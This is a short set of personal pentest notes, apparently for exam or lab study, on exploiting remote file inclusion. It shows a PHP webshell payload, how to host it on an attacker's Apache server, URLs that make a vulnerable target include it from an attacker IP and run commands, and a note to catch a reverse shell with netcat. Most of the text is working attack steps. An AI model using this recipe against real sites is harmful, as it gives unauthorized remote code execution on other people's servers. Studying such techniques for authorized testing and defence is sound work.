RFI - Theory & basic commands
#Basics
Remote file inclusion (RFI)
1)evil payload hosted on kali + apache server
2)nc listener to catch revshell
…..file=http://192.168.177.119:8080/evil.txt
cat evil.txt
<?php system($_GET['cmd']); ?>
The ‘cmd’ in the string will allow to execute any code once in place
3)move the evil.txt to /var/www/html/evil.txt
then start apache server:
sudo systemctl start apache2
check that is up and running
service apache2 status
once hosted in /var/www/html you can retrieve the evil webshell from the url
…file=http://192.168.119.177/evil.txt&cmd=ipconfig
#At this point escalate running a revshell on target
#Assorted tricks
#Extra server options
Last updated